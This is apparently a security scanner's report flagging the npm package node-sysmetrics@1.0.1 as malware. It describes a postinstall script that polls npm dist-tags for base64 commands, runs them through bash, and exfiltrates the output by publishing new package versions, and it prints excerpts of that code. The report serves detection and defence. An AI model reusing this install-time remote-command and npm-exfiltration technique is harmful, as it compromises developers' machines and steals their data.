registry  /  node-sysmetrics  /  1.0.1

node-sysmetrics@1.0.1

System metrics collector

AI Security Review

scanned 3h ago · by lpm-firewall-ai

Installing the package triggers a persistent remote-command agent. It obtains commands from npm metadata, executes them through Bash, and publishes the results.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
`npm install node-sysmetrics@1.0.1`
Impact
Arbitrary shell commands execute under the installing user's permissions; command output is republished to npm.
Mechanism
postinstall remote command execution with detached persistence and npm-based exfiltration
Attack narrative
The postinstall script configures npm authentication, starts a detached copy of itself, and continuously polls `registry.npmjs.org/node-sysmetrics`. A changed base64 `cmd` dist-tag is decoded and executed with `bash -c`; stdout/stderr and exit code are embedded in a newly published package version. This is an install-triggered remote shell agent with persistence and data exfiltration.
Rationale
Direct inspection confirms concrete malicious install-time remote command execution, persistence, credential configuration mutation, and output exfiltration via npm publishing.
Evidence
package.jsoninstall.js/tmp/.sysm-agent.js/tmp/sysm-pkg/package.json/tmp/sysm-pkg/index.js
Network endpoints1
registry.npmjs.org

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `package.json` runs `node install.js` on `postinstall`.
  • `install.js` polls npm registry dist-tags using an embedded bearer token.
  • Registry-provided base64 data is decoded and passed to `bash -c`.
  • Install copies itself to `/tmp/.sysm-agent.js` and launches a detached Node process.
  • It changes npm auth configuration and publishes command output in new package versions.
Evidence against
  • No system-metrics collection implementation or benign package entrypoint is present.
  • The package contains only `package.json` and the install-time control script.
Behavioral surface
Source
ChildProcessFilesystemNetworkShell
Supply chain
HighEntropyStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 2.14 KB of source

Source & flagged code

7 flagged · loading source
package.jsonView file
scripts.postinstall = node install.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = node install.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
install.jsView file
6patternName = npm_token severity = critical line = 6 matchedText = const TO...30';
Critical
Critical Secret

Package contains a critical-looking secret pattern.

install.jsView on unpkg · L6
1const { execSync, spawnSync, spawn } = require('child_process'); L2: const https = require('https'); L3: const fs = require('fs'); ... L13: res.on('data', c => d += c); L14: res.on('end', () => { try { resolve(JSON.parse(d)); } catch(e) { resolve({}); } }); L15: }).on('error', () => resolve({})); ... L20: const r = spawnSync('bash', ['-c', cmd], { timeout: 25000, encoding: 'utf8' }); L21: return { output: (r.stdout || '') + (r.stderr || ''), exit_code: r.status || 0 }; L22: } ... L27: const pkg = { name: PKG, version: '1.0.' + Date.now() % 100000, description: encoded, license: 'MIT' }; L28: fs.writeFileSync('/tmp/sysm-pkg/package.json', JSON.stringify(pkg)); L29: fs.writeFileSync('/tmp/sysm-pkg/index.js', '');
Critical
Npm Publish Worm

Source mutates package metadata and republishes itself to npm.

install.jsView on unpkg · L1
1Trigger-reachable chain: scripts.postinstall -> install.js L1: const { execSync, spawnSync, spawn } = require('child_process'); L2: const https = require('https'); L3: const fs = require('fs'); ... L13: res.on('data', c => d += c); L14: res.on('end', () => { try { resolve(JSON.parse(d)); } catch(e) { resolve({}); } }); L15: }).on('error', () => resolve({})); ... L20: const r = spawnSync('bash', ['-c', cmd], { timeout: 25000, encoding: 'utf8' }); L21: return { output: (r.stdout || '') + (r.stderr || ''), exit_code: r.status || 0 }; L22: } ... L27: const pkg = { name: PKG, version: '1.0.' + Date.now() % 100000, description: encoded, license: 'MIT' }; L28: fs.writeFileSync('/tmp/sysm-pkg/package.json', JSON.stringify(pkg)); L29: fs.writeFileSync('/tmp/sysm-pkg/index.js', '');
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

install.jsView on unpkg · L1
6patternName = npm_token severity = critical line = 6 matchedText = const TO...30';
Critical
Secret Pattern

npm access token in install.js

install.jsView on unpkg · L6
1const { execSync, spawnSync, spawn } = require('child_process'); L2: const https = require('https');
High
Child Process

Package source references child process execution.

install.jsView on unpkg · L1

Findings

4 Critical3 High3 Medium3 Low
CriticalCritical Secretinstall.js
CriticalNpm Publish Worminstall.js
CriticalTrigger Reachable Dangerous Capabilityinstall.js
CriticalSecret Patterninstall.js
HighInstall Time Lifecycle Scriptspackage.json
HighChild Processinstall.js
HighShell
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
MediumStructural Risk Force Deep Review
LowScripts Present
LowFilesystem
LowHigh Entropy Strings